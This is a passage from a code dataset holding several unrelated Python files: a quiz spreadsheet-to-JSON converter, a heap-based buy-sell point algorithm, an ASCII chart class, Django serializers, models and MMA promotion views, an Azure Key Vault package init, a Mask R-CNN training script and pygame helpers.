json\nsheets=[\"dangshi\",\"xinzhongguo\",\"gaigekaifang\",\"fazhanshi\"]\nout={}\n# the four spreadsheets share one schema, so a single loop replaces the four\n# copy-pasted blocks of the original\nfor name in sheets:\n    raw=pd.read_excel(name+\".xlsx\")\n    out[name]=[]\n    for i in range(0,len(raw)):\n        t={}\n        t[\"question\"]=raw['problem'][i]\n        t[\"option\"]={}\n        t[\"option\"][\"A\"]=raw['cha'][i]\n        t[\"option\"][\"B\"]=raw['chb'][i]\n        t[\"option\"][\"C\"]=raw['chc'][i]\n        t[\"true\"]=raw['real'][i]\n        t[\"type\"]=1\n        t[\"scores\"]=10\n        t['checked']=False\n        out[name].append(t)\n\nout_all=json.dumps(out,ensure_ascii=False,indent=4)\n# utf-8 is forced because ensure_ascii=False keeps the Chinese text as-is\nwith open(\"test.json\",'w',encoding='utf-8') as fs:\n    fs.write(out_all)\nprint(out_all)","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"6334921","text":"import time\n\nfrom cycle_dating.Utilities import use_data as ud, series\nfrom cycle_dating.Algos import optim_virtual\nfrom cycle_dating.Algos.Utilities.LinkedList import LinkedList\n\n\nclass Node:\n    \"\"\"\n    defines a node, which will be used to store a value in the heap\n    actual values are stored in the linked list. 
the node accesses the\n element in the linked list via the link variable\n comparison operators are also defined for convenience\n \"\"\"\n __slots__ = [\"link\"]\n def __init__(self, link):\n self.link = link\n def __le__(self, other):\n return self.link.val <= other\n def __lt__(self, other):\n return self.link.val < other\n def __ge__(self, other):\n return self.link.val >= other\n def __gt__(self, other):\n return self.link.val > other\n def __eq__(self, other):\n return self.link.val == other\n def __ne__(self, other):\n return not (self.link.val == other)\n\nclass BU(optim_virtual.Optim):\n \"\"\"\n Class implementation for BSA-BU algorithm\n\n Args:\n dim (int): Number of buy-sell points, K\n long (bool): True if long sequence if buy-sell points is required\n trans_cost (float): transaction cost\n from_hierarch (bool): True if instance is used in hierarchical method, False if not\n \"\"\"\n def __init__(self, dim, long=True, trans_cost=0.0, from_hierarch=False, **kwargs):\n self.ident = \"BU\"\n super().__init__(dim, long, trans_cost, from_hierarch)\n\n def get_name(self):\n return \"BU\"\n\n def get_params(self):\n return {\"Name\": self.get_name()}\n\n def set_data(self, data):\n super().set_data(data)\n self.data.fix_long_short(long=self.long)\n self.series = self.data.reduced\n self.pos = LinkedList()\n for idx in range(len(self.series)):\n self.pos.push_back(idx)\n self.pos.assign_vals(self.series)\n if self.dim > len(self.series):\n self.dim = len(self.series)\n return\n self.heap_create()\n\n def _optimise(self, **kwargs):\n while self.pos.size > self.dim:\n self.remove_lowest_el()\n self.pos = self.pos.make_pos_list()\n return self.pos, self.evaluate()\n\n def heap_create(self):\n ordinary_pos_list = self.pos.make_ordinary_list()\n self.node_list = [Node(link=link) for link in ordinary_pos_list[:-1]]\n self.heap = []\n for node in self.node_list:\n self.heap_insert(node)\n return self.heap\n\n def heap_insert(self, val):\n \"\"\"inserts a value into the heap\n\n Args\n val (float): value to be inserted\n returns None\n \"\"\"\n self.heap.append(val)\n val.link.heap_idx = len(self.heap) - 1\n n = len(self.heap) - 1\n self.heap_bubble_up(n)\n\n def heap_bubble_up(self, idx):\n \"\"\"Adjust value at position idx\n\n called when an adjustment must be made. idx is the array index of the element\n that was removed. this function is called when the element that replaced\n the removed element at idx is smaller than its parent\n\n Args\n idx (int): index of element to be adjusted (in heap array)\n Returns:\n None\n \"\"\"\n if idx > 0:\n parent_idx = (idx - 1)//2\n if self.heap[parent_idx] > self.heap[idx]:\n temp = self.heap[parent_idx]\n self.heap[parent_idx] = self.heap[idx]\n self.heap[idx] = temp\n self.heap[idx].link.heap_idx = idx\n self.heap[parent_idx].link.heap_idx = parent_idx\n idx = parent_idx\n self.heap_bubble_up(idx)\n\n def heap_bubble_down(self, idx):\n \"\"\"Adjust value at position idx\n\n called when an adjustment must be made. idx is the array index of the element\n that was removed. 
this function is called when the element that replaced\n the removed element at idx is larger than one of its children\n\n Args\n idx (int): index of element to be adjusted (in heap array)\n Returns:\n None\n \"\"\"\n child1_idx, child2_idx = 2*idx + 1, 2*idx + 2\n repl_value = float(\"inf\")\n repl_idx = None\n try:\n if self.heap[child1_idx] < self.heap[idx]:\n repl_value = self.heap[child1_idx]\n repl_idx = child1_idx\n except IndexError:\n pass\n try:\n if self.heap[child2_idx] < self.heap[idx]:\n if self.heap[child2_idx] < repl_value:\n repl_value = self.heap[child2_idx]\n repl_idx = child2_idx\n except IndexError:\n pass\n if repl_idx is not None:\n temp = self.heap[repl_idx]\n self.heap[repl_idx] = self.heap[idx]\n self.heap[idx] = temp\n self.heap[repl_idx].link.heap_idx = repl_idx\n self.heap[idx].link.heap_idx = idx\n self.heap_bubble_down(repl_idx)\n\n def heap_remove(self, idx):\n \"\"\"Remove a specific element from the heap, identified by idx\n\n Args\n idx (int): the index of the element in the heap array\n returns (Node):\n heap node that was removed\n \"\"\"\n ret_val = self.heap[idx]\n self.heap[idx] = self.heap[-1]\n self.heap[idx].link.heap_idx = idx\n del self.heap[-1]\n if idx < len(self.heap):\n if self.heap[idx] > ret_val:\n self.heap_bubble_down(idx)\n elif self.heap[idx] < ret_val:\n self.heap_bubble_up(idx)\n return ret_val\n\n def remove_lowest_el(self):\n \"\"\"Remove lowest element from the heap (the root)\n\n removes the lowest (topmost) element from the heap\n and adjusts the heap accordingly\n\n Returns:\n None\n \"\"\"\n rem_node = self.heap[0]\n if rem_node.link.next is self.pos.back:\n self.pos.del_node(rem_node.link.next)\n self.heap_remove(rem_node.link.prev.heap_idx)\n self.heap_remove(rem_node.link.heap_idx)\n self.pos.del_node(rem_node.link)\n elif rem_node.link is self.pos.root:\n self.heap_remove(rem_node.link.heap_idx)\n self.heap_remove(rem_node.link.next.heap_idx)\n self.pos.del_node(rem_node.link.next)\n self.pos.del_node(rem_node.link)\n else:\n if rem_node.link is self.pos.back:\n print (\"INVALID: rem_node.link is self.pos.back\")\n try:\n self.heap_remove(rem_node.link.heap_idx)\n self.heap_remove(rem_node.link.next.heap_idx)\n except IndexError:\n while rem_node.link is not None:\n print (rem_node.link.idx)\n print (rem_node.link.next.heap_idx)\n print (len(self.heap))\n rem_node = self.heap[rem_node.link.next.heap_idx]\n raise IndexError\n new_first_link = rem_node.link.prev\n new_2nd_link = rem_node.link.next.next\n self.pos.del_node(rem_node.link.next)\n self.pos.del_node(rem_node.link)\n new_first_link.val = abs(self.series[new_2nd_link.idx].val - self.series[\n new_first_link.idx].val)\n self.heap_bubble_down(new_first_link.heap_idx)\n\ndef main2():\n bu_obj = BU(10, long=True)\n series_obj = series.Series(series_len=5000, seed=10)\n begin_time = time.time()\n bu_obj.set_data(series_obj)\n pos, fitness = bu_obj.optimise()\n print (\"Time taken: \", time.time() - begin_time)\n ud.plot_solution(series_obj, pos, scatter=True, linewidth=2.3)\n\nif __name__ == \"__main__\":\n main2()","sub_path":"cycle_dating/Algos/bottom_up.py","file_name":"bottom_up.py","file_ext":"py","file_size_in_byte":7767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"65027786","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n\n__updated__ = '2018-02-26 22:55:39'\n\nimport collections\n\n\n'''\n Python3.6 AsciiChart and AsciiChartCfg classes are based on 
https://github.com/kroitor/asciichart\n'''\n\n\nclass AsciiChart(object):\n\n    default_format = '{:+.2f}'\n    default_offset = 3\n\n    def __init__(self, format=default_format, offset=default_offset):\n        if not isinstance(format, str):\n            raise TypeError\n        if not isinstance(offset, int):\n            raise TypeError\n        self.format = format if format is not None else AsciiChart.default_format\n        self.offset = max(offset, 3) if offset is not None else AsciiChart.default_offset\n\n    def compute_buffer(self, seq, height=None, padding=0):\n        if isinstance(seq, str):\n            raise TypeError\n        if not isinstance(seq, collections.Sequence):\n            raise TypeError\n\n        minimum = min(seq)\n        maximum = max(seq)\n        label_length = max(\n            len(self.format.format(minimum)),\n            len(self.format.format(maximum)),\n            int(padding),\n            0\n        )\n\n        min_max_range = float(abs(maximum - minimum))\n        if height is None:\n            height = min_max_range\n        else:\n            height = float(height)\n\n        ratio = height / min_max_range\n        minimum2 = int(minimum * ratio)\n        maximum2 = int(maximum * ratio)\n        rows = abs(maximum2 - minimum2)\n        offset = self.offset # label, whitespace, axis; honour the value clamped in __init__, which was previously ignored\n        width = len(seq) + offset\n\n        # init with whitespace\n        result = [[' ' for col in range(0, width)] for row in range(0, rows+1)]\n\n        # init label and axis\n        for y in range(minimum2, maximum2+1):\n            label = ('{:>' + str(label_length) + '}').format(\n                self.format.format(maximum - (y - minimum2) * min_max_range / rows)\n            )\n            result[y - minimum2][0] = label\n            result[y - minimum2][2] = '┼' if y == 0 else '┤'\n\n        # first value\n        y0 = int(next(iter(seq)) * ratio) - minimum2\n        result[rows - y0][2] = '┼'\n\n        # the line\n        for x in range(0, len(seq)-1):\n            y0 = int(seq[x+0] * ratio) - minimum2\n            y1 = int(seq[x+1] * ratio) - minimum2\n            if y0 == y1:\n                result[rows - y0][x + offset] = '─'\n            else:\n                result[rows - y1][x + offset] = '╰' if y0 > y1 else '╭'\n                result[rows - y0][x + offset] = '╮' if y0 > y1 else '╯'\n                for y in range(min(y0, y1)+1, max(y0, y1)):\n                    result[rows - y][x + offset] = '│'\n\n        return result\n\n    def compute_plot(self, seq, height=None, padding=0):\n        result = self.compute_buffer(seq, height=height, padding=padding)\n        return '\\n'.join(''.join(row) for row in result)\n","sub_path":"nanopooltool/ascii_chart.py","file_name":"ascii_chart.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"216580844","text":"from .models import Person, Employee\nfrom rest_framework import serializers\n\n\nclass PersonSerializer(serializers.ModelSerializer):\n    id = serializers.IntegerField(read_only=True)\n    class Meta:\n        model = Person\n        fields = ['id', 'last_name', 'first_name', 'birth_date']\n\n\nclass EmployeeSerializer(serializers.ModelSerializer):\n    id = serializers.IntegerField(read_only=True)\n    person = PersonSerializer(many=False, read_only=False)\n    class Meta:\n        model = Employee\n        fields = ['id', 'employee_num', 'employee_date', 'terminated_date', 'person']\n    def create(self, validated_data):\n        person = Person(last_name=validated_data.get('person').get('last_name'), first_name=validated_data.get('person').get('first_name'), birth_date=validated_data.get('person').get('birth_date'))\n        person.save()\n        employee = Employee.objects.create(person=person, employee_num=validated_data.get('employee_num'), employee_date=validated_data.get('employee_date'), terminated_date=validated_data.get('terminated_date'))\n        employee.save()\n        return employee\n    def update(self, instance, validated_data):\n        employee = Employee.objects.get(id=instance.id)\n        
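# Added note: DRF does not apply nested writes on its own, so each validated\n        # field below is copied onto the Employee and its related Person by hand.\n        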
employee.employee_num = validated_data.get('employee_num')\n employee.employee_date = validated_data.get('employee_date')\n employee.terminated_date = validated_data.get('terminated_date')\n person = Person.objects.get(id=employee.person.id)\n person.first_name = validated_data.get('person').get('first_name')\n person.last_name = validated_data.get('person').get('last_name')\n person.birth_date = validated_data.get('person').get('birth_date')\n person.save()\n employee.person = person\n employee.save()\n return employee\n","sub_path":"backend/employees/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"561115480","text":"from django.db import models\nfrom django.forms import ModelForm\nimport django_tables2 as tables\nfrom .vacations import Vacations\nfrom datetime import datetime\n\nclass Date(models.Model):\n vacation_id = models.ForeignKey(Vacations,on_delete=models.CASCADE)\n date = models.DateField(blank=False,default=datetime.now)\n date_id = models.AutoField(null=True,primary_key=True)\n\n\n def __str__(self):\n attributes = []\n for attribute in self._meta.get_fields():\n attributes.append(getattr(self,str(attribute),''))\n return ' '.join(attributes)\n\nclass DateForm(ModelForm):\n class Meta:\n model = Date\n exclude = ['vacation_id']\n\nclass DateTable(tables.Table):\n select_dates = tables.CheckBoxColumn(accessor = 'pk', attrs = { \"th__input\": {\"onclick\": \"toggle_date(this)\"}}, orderable=False)\n class Meta:\n model = Date\n exclude = ('vacation_id','date_id')\n\nclass DateTable_esp(tables.Table):\n fecha = tables.TemplateColumn('{{record.date}}')\n select_dates = tables.CheckBoxColumn(accessor = 'pk', attrs = { \"th__input\": {\"onclick\": \"toggle_date(this)\"}}, orderable=False)\n class Meta:\n model = Date\n exclude = ('vacation_id','date_id','date')\n\n","sub_path":"hound_app/hound/models/date.py","file_name":"date.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"321296438","text":"# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nfrom .client import CertificateClient\nfrom .enums import ActionType, KeyCurveName, KeyType, SecretContentType, KeyUsageType\nfrom .models import AdministratorDetails, CertificatePolicy, Contact, LifetimeAction\n\n__all__ = [\n \"ActionType\",\n \"AdministratorDetails\",\n \"CertificateClient\",\n \"CertificatePolicy\",\n \"Contact\",\n \"KeyCurveName\",\n \"KeyType\",\n \"KeyUsageType\",\n \"LifetimeAction\",\n \"SecretContentType\",\n]\n","sub_path":"sdk/keyvault/azure-keyvault-certificates/azure/keyvault/certificates/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"364905804","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\nimport os \nimport sys\nimport random\nimport math\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport json\nimport pydicom\nfrom imgaug import augmenters as iaa\nfrom tqdm import tqdm\nimport pandas as pd \nimport glob\n\n#sys.path.append(os.path.join(ROOT_DIR, 'Mask_RCNN')) \nfrom mrcnn.config import Config\nfrom mrcnn import utils\nimport mrcnn.model as modellib\nfrom mrcnn import visualize\nfrom mrcnn.model 
import log\n\n\n# In[2]:\n\n\n#train_dicom_dir = os.path.join(DATA_DIR, 'train_images')\n#test_dicom_dir = os.path.join(DATA_DIR, 'test_images')\n\n\n# In[5]:\n\n\n# load data (the bare names below were NameErrors; their definitions above stay\n# commented out because the paths are environment-specific)\n#train_dicom_dir\n#test_dicom_dir\n\n\n# In[6]:\n\n\nCOCO_WEIGHTS_PATH = \"mask_rcnn_coco.h5\"\n\n\n# In[7]:\n\n\nclass autoConfig(Config):\n    NAME = \"auto\"\n    GPU_COUNT = 1\n    IMAGES_PER_GPU = 8\n    NUM_CLASSES = 1 + 3 \n    IMAGE_MIN_DIM = 128\n    IMAGE_MAX_DIM = 128\n    RPN_ANCHOR_SCALES = (8, 16, 32, 64, 128) \n    TRAIN_ROIS_PER_IMAGE = 8\n    STEPS_PER_EPOCH = 10\n    \nconfig = autoConfig()\nconfig.display()\n\n\n# In[8]:\n\n\nclass autoDataset(utils.Dataset):\n    def load_auto(self, count, height, width):\n        # Add classes\n        self.add_class(\"auto\", 1, \"car\")\n        self.add_class(\"auto\", 2, \"person\")\n        self.add_class(\"auto\", 3, \"traffic\")\n\n        # Add images\n        for i in range(count):\n            bg_color, auto = self.random_image(height, width)\n            self.add_image(\"auto\", image_id=i, path=None,\n                           width=width, height=height,\n                           bg_color=bg_color, auto=auto)\n\n    def load_image(self, image_id):\n        info = self.image_info[image_id]\n        bg_color = np.array(info['bg_color']).reshape([1, 1, 3])\n        image = np.ones([info['height'], info['width'], 3], dtype=np.uint8)\n        image = image * bg_color.astype(np.uint8)\n        for shape, color, dims in info['auto']:\n            image = self.draw_shape(image, shape, dims, color)\n        return image\n\n    def image_reference(self, image_id):\n        info = self.image_info[image_id]\n        if info[\"source\"] == \"auto\":\n            return info[\"auto\"]\n        else:\n            super(self.__class__).image_reference(self, image_id)\n\n    def load_mask(self, image_id):\n        info = self.image_info[image_id]\n        auto = info['auto']\n        count = len(auto)\n        mask = np.zeros([info['height'], info['width'], count], dtype=np.uint8)\n        for i, (shape, _, dims) in enumerate(info['auto']):\n            mask[:, :, i:i+1] = self.draw_shape(mask[:, :, i:i+1].copy(),\n                                                shape, dims, 1)\n        # Handle occlusions\n        occlusion = np.logical_not(mask[:, :, -1]).astype(np.uint8)\n        for i in range(count-2, -1, -1):\n            mask[:, :, i] = mask[:, :, i] * occlusion\n            occlusion = np.logical_and(occlusion, np.logical_not(mask[:, :, i]))\n        # Map class names to class IDs.\n        class_ids = np.array([self.class_names.index(s[0]) for s in auto])\n        return mask.astype(np.bool), class_ids.astype(np.int32)\n\n    def draw_shape(self, image, shape, dims, color):\n        # Get the center x, y and the size s\n        x, y, s = dims\n        if shape == 'car':\n            cv2.rectangle(image, (x-s, y-s), (x+s, y+s), color, -1)\n        elif shape == \"person\":\n            cv2.circle(image, (x, y), s, color, -1)  # cv2.person does not exist; a \"person\" is drawn as a circle\n        elif shape == \"traffic\":\n            points = np.array([[(x, y-s),\n                                (x-s/math.sin(math.radians(60)), y+s),\n                                (x+s/math.sin(math.radians(60)), y+s),\n                                ]], dtype=np.int32)\n            cv2.fillPoly(image, points, color)\n        return image\n\n    def random_shape(self, height, width):\n        # auto\n        shape = random.choice([\"car\", \"person\", \"traffic\"])\n        # Color\n        color = tuple([random.randint(0, 255) for _ in range(3)])\n        # Center x, y\n        buffer = 20\n        y = random.randint(buffer, height - buffer - 1)\n        x = random.randint(buffer, width - buffer - 1)\n        # Size\n        s = random.randint(buffer, height//4)\n        return shape, color, (x, y, s)\n\n    def random_image(self, height, width):\n        bg_color = np.array([random.randint(0, 255) for _ in range(3)])\n        # Generate a few random auto and record their\n        # bounding boxes\n        auto = []\n        boxes = []\n        N = random.randint(1, 4)\n        for _ in range(N):\n            shape, color, dims = self.random_shape(height, width)\n            auto.append((shape, color, dims))\n            x, y, s = dims\n            boxes.append([y-s, x-s, y+s, x+s])\n        
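# Added note: utils.non_max_suppression below keeps only shapes whose boxes\n        # overlap earlier ones by less than 0.3 IoU, so the masks stay mostly visible.\n        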
keep_ixs = utils.non_max_suppression(np.array(boxes), np.arange(N), 0.3)\n        auto = [s for i, s in enumerate(auto) if i in keep_ixs]\n        return bg_color, auto\n\n\n# In[11]:\n\n\ndataset_train = autoDataset()\ndataset_train.load_auto(500, config.IMAGE_SHAPE[0], config.IMAGE_SHAPE[1])\ndataset_train.prepare()\ndataset_val = autoDataset()\ndataset_val.load_auto(50, config.IMAGE_SHAPE[0], config.IMAGE_SHAPE[1])\ndataset_val.prepare()\nimage_ids = np.random.choice(dataset_train.image_ids, 4)\nfor image_id in image_ids:\n    image = dataset_train.load_image(image_id)\n    mask, class_ids = dataset_train.load_mask(image_id)\n    visualize.display_top_masks(image, mask, class_ids, dataset_train.class_names)\n\n\n# In[10]:\n\n\nMODEL_DIR = \"./logs\"  # assumption: the original export never defines its log directory\n\n# Create model in training mode\nmodel = modellib.MaskRCNN(mode=\"training\", config=config,\n                          model_dir=MODEL_DIR)\nmodel.load_weights(COCO_WEIGHTS_PATH, by_name=True, exclude=[\"mrcnn_class_logits\", \"mrcnn_bbox_fc\", \"mrcnn_bbox\", \"mrcnn_mask\"])  # was COCO_MODEL_PATH, which is never defined\n\n# Train the head branches\nmodel.train(dataset_train, dataset_val, \n            learning_rate=config.LEARNING_RATE, \n            epochs=1, \n            layers='heads')\n# Save weights\n# model_path = os.path.join(MODEL_DIR, \"mask_rcnn_shapes.h5\")\n# model.keras_model.save_weights(model_path)\nhistory = model.keras_model.history.history\n\n\n# In[14]:\n\n\nclass InferenceConfig(autoConfig):\n    GPU_COUNT = 1\n    IMAGES_PER_GPU = 1\n\ninference_config = InferenceConfig()\n\nmodel = modellib.MaskRCNN(mode=\"inference\", \n                          config=inference_config,\n                          model_dir=MODEL_DIR)\nmodel_path = model.find_last()\n#print(\"Loading weights from \", model_path)\nmodel.load_weights(model_path, by_name=True)\n#history = model.keras_model.history.history  # disabled: this overwrote the training history with the fresh inference model's\n\n\n# In[17]:\n\n\n# Test on a random image\nimage_id = random.choice(dataset_val.image_ids)\noriginal_image, image_meta, gt_class_id, gt_bbox, gt_mask = modellib.load_image_gt(dataset_val, inference_config, \n                                                                                   image_id, use_mini_mask=False)\n\nlog(\"original_image\", original_image)\nlog(\"image_meta\", image_meta)\nlog(\"gt_class_id\", gt_class_id)\nlog(\"gt_bbox\", gt_bbox)\nlog(\"gt_mask\", gt_mask)\n\nvisualize.display_instances(original_image, gt_bbox, gt_mask, gt_class_id, \n                            dataset_train.class_names, figsize=(8, 8))\n\n\n# In[20]:\n\n\nresults = model.detect([original_image], verbose=1)\nr = results[0]\n# get_ax() was an undefined notebook helper, so display_instances makes its own axes\nvisualize.display_instances(original_image, r['rois'], r['masks'], r['class_ids'], \n                            dataset_val.class_names, r['scores'])\n\n\n# In[22]:\n\n\nepochs = range(1, len(history[\"loss\"]) + 1)  # x-axis for the plots; 'epochs' was undefined\nplt.figure(figsize=(8,4))\nplt.subplot(131)\nplt.plot(epochs, history[\"loss\"], label=\"Training loss\")\nplt.legend()\nplt.show()\n\n\n# In[23]:\nplt.figure(figsize=(8,4))\nplt.subplot(131)\nplt.plot(epochs, history[\"accuracy\"], label=\"Training accuracy\")  # key may be 'acc' on older Keras\nplt.legend()\nplt.show()\n\n\n\n\n\n\n","sub_path":"Code/Mask-R-CNN.py","file_name":"Mask-R-CNN.py","file_ext":"py","file_size_in_byte":7467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"440703032","text":"import pygame\n\nfrom math import sqrt\nfrom random import random, randint\n\ndef load_png(name):\n    \"\"\" Load image and return image object\"\"\"\n    try:\n        img = pygame.image.load(name)\n    except pygame.error:\n        raise SystemExit('Cannot load image: %s' % name)\n\n    if img.get_alpha() is None:\n        img = img.convert()\n    else:\n        img = img.convert_alpha()\n\n    return img, img.get_rect()\n\n\ndef get_random_colour():\n    r = randint(0, 255)\n    g = randint(0, 255)\n    b = randint(0, 255)\n    return (r, g, b)\n\n\ndef dist(p1, p2):\n    return sqrt((p1[0] - p2[0])**2 + 
(p1[1]-p2[1])**2)\n","sub_path":"Missão/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"85508780","text":"from django.contrib import messages\r\nfrom django.contrib.auth import login\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.db import transaction\r\nfrom django.db.models import Avg, Count\r\nfrom django.forms import inlineformset_factory\r\nfrom django.shortcuts import get_object_or_404, redirect, render\r\nfrom django.urls import reverse, reverse_lazy\r\nfrom django.utils.decorators import method_decorator\r\nfrom django.views.generic import (CreateView, DeleteView, DetailView, ListView,\r\n UpdateView)\r\nfrom django.db.models import Q\r\n\r\nfrom ..decorators import promotion_required\r\nfrom ..forms import PromotionSignUpForm, BoutForm, FightForm\r\nfrom ..models import User, Event, Bout, Fighter, FightOffer, FinishedFight\r\n\r\n\r\nclass PromotionSignUpView(CreateView):\r\n model = User\r\n form_class = PromotionSignUpForm\r\n template_name = 'registration/signup_form.html'\r\n\r\n def get_context_data(self, **kwargs):\r\n kwargs['user_type'] = 'promotion'\r\n return super().get_context_data(**kwargs)\r\n\r\n def form_valid(self, form):\r\n user = form.save()\r\n login(self.request, user)\r\n return redirect('promotions:promotion_home')\r\n\r\n\r\n@method_decorator([login_required, promotion_required], name='dispatch')\r\nclass PromotionHomeView(ListView):\r\n model = User\r\n ordering = ('name',)\r\n context_object_name = 'promotions'\r\n template_name = 'ammamanager/promotions/promotion_home.html'\r\n\r\n\r\n@login_required\r\n@promotion_required\r\ndef promotion_home(request,*args, **kwargs):\r\n fights = FinishedFight.objects.all().filter(event__owner = request.user)\r\n ko = 0\r\n sub = 0\r\n dec = 0\r\n draw = 0\r\n nc = 0\r\n flw = 0\r\n bw = 0\r\n fw = 0\r\n lw = 0\r\n ww = 0\r\n mw = 0\r\n lhw = 0\r\n hw = 0\r\n for f in fights:\r\n if f.method == 'KO':\r\n ko += 1\r\n elif f.method == 'SUB':\r\n sub += 1\r\n elif f.method == 'DEC':\r\n dec += 1\r\n elif f.method == 'DRAW':\r\n draw += 1\r\n elif f.method == 'NC':\r\n nc += 1\r\n if f.bout.weight == 'FLW':\r\n flw += 1\r\n elif f.bout.weight == 'BW':\r\n bw += 1\r\n elif f.bout.weight == 'FW':\r\n fw += 1\r\n elif f.bout.weight == 'LW':\r\n lw += 1\r\n elif f.bout.weight == 'WW':\r\n ww += 1\r\n elif f.bout.weight == 'MW':\r\n mw += 1\r\n elif f.bout.weight == 'LHW':\r\n lhw += 1\r\n elif f.bout.weight == 'HW':\r\n hw += 1\r\n\r\n return render(request, 'ammamanager/promotions/promotion_home.html', {\r\n 'KO' : ko,\r\n 'SUB' : sub,\r\n 'DEC' : dec,\r\n 'DRAW': draw,\r\n 'NC': nc,\r\n 'flw': flw,\r\n 'bw': bw,\r\n 'fw': fw,\r\n 'lw': lw,\r\n 'ww': ww,\r\n 'mw': mw,\r\n 'lhw': lhw,\r\n 'hw': hw\r\n })\r\n\r\n\r\n@method_decorator([login_required, promotion_required], name='dispatch')\r\nclass ListEventsView(ListView):\r\n model = Event\r\n ordering = ('name', )\r\n context_object_name = 'events'\r\n template_name = 'ammamanager/promotions/event_list_finished.html'\r\n def get_queryset(self):\r\n queryset = self.request.user.events.order_by('-id').filter(finished= True)\r\n return queryset\r\n\r\n@method_decorator([login_required, promotion_required], name='dispatch')\r\nclass ListEventsUpcomingView(ListView):\r\n model = Event\r\n ordering = ('name', )\r\n context_object_name = 'events'\r\n template_name = 'ammamanager/promotions/event_list.html'\r\n def 
get_queryset(self):\r\n queryset = self.request.user.events.order_by('-id').filter(finished= False)\r\n return queryset\r\n\r\n@method_decorator([login_required, promotion_required], name='dispatch')\r\nclass EventCreateView(CreateView):\r\n model = Event\r\n fields = ('name','date',)\r\n template_name = 'ammamanager/promotions/event_add_form.html'\r\n\r\n def form_valid(self, form):\r\n event = form.save(commit=False)\r\n event.owner = self.request.user\r\n event.save()\r\n messages.success(self.request, 'Event Successfully Added!!')\r\n return redirect('promotions:event_list')\r\n\r\n\r\n@method_decorator([login_required, promotion_required], name='dispatch')\r\nclass EventView(UpdateView):\r\n model = Event\r\n fields = ('name',)\r\n context_object_name = 'event'\r\n template_name = 'ammamanager/promotions/event.html'\r\n\r\n def get_context_data(self, **kwargs):\r\n kwargs['bouts'] = self.get_object().bouts.annotate(answers_count=Count('weight'))\r\n return super().get_context_data(**kwargs)\r\n\r\n def get_queryset(self):\r\n return self.request.user.events.all()\r\n\r\n def get_success_url(self):\r\n return reverse('promotions:event', kwargs={'pk': self.object.pk})\r\n\r\n@login_required\r\n@promotion_required\r\ndef finished_event(request, pk):\r\n event = get_object_or_404(Event, pk=pk, owner=request.user)\r\n bouts = Bout.objects.all().filter(event=event)\r\n finished = FinishedFight.objects.all().filter(event=event)\r\n\r\n return render(request, 'ammamanager/promotions/finished_event.html', {\r\n 'event': event,\r\n 'bouts': bouts,\r\n 'finished': finished\r\n })\r\n\r\n@login_required\r\n@promotion_required\r\ndef event(request, pk):\r\n event = get_object_or_404(Event, pk=pk, owner=request.user)\r\n bouts = Bout.objects.all().filter(event=event)\r\n finbouts = Bout.objects.all().filter(event=event).filter(set=True).filter(completed=False)\r\n finished = FinishedFight.objects.all().filter(event=event)\r\n if event.finished == False:\r\n return render(request, 'ammamanager/promotions/event.html', {\r\n 'event': event,\r\n 'bouts': bouts,\r\n 'finished': finished\r\n })\r\n else:\r\n return render(request, 'ammamanager/promotions/finished_event.html', {\r\n 'event': event,\r\n 'finbouts': finbouts,\r\n 'finished': finished\r\n })\r\n\r\n\r\n@login_required\r\n@promotion_required\r\ndef bout_add(request, pk):\r\n\r\n event = get_object_or_404(Event, pk=pk, owner=request.user)\r\n\r\n if request.method == 'POST':\r\n form = BoutForm(request.POST)\r\n if form.is_valid():\r\n bout = form.save(commit=False)\r\n bout.event = event\r\n bout.fighter1 = None\r\n bout.fighter2 = None\r\n bout.save()\r\n messages.success(request, 'You may now add fighters to the bout.')\r\n return redirect('promotions:event', event.pk)\r\n else:\r\n form = BoutForm()\r\n\r\n return render(request, 'ammamanager/promotions/bout_add_form.html', {'event': event, 'form': form})\r\n\r\n\r\n\r\n\r\n\r\n@login_required\r\n@promotion_required\r\ndef BoutView(request, pk, bout_pk, *args, **kwargs):\r\n\r\n event = get_object_or_404(Event, pk=pk, owner=request.user)\r\n bout = get_object_or_404(Bout, pk=bout_pk, event=event)\r\n fighters = Fighter.objects.all().filter(weight=bout.weight).filter(available = True)\r\n recfighterstemp = None;\r\n if bout.fighter1 is not None:\r\n fighters = fighters.exclude(pk=bout.fighter1.pk)\r\n recfighterstemp = fighters.filter(Q(rank=bout.fighter1.rank + 1) | Q(rank=bout.fighter1.rank - 1))\r\n\r\n query = request.GET.get(\"q\", None)\r\n if query is not None:\r\n fighters = 
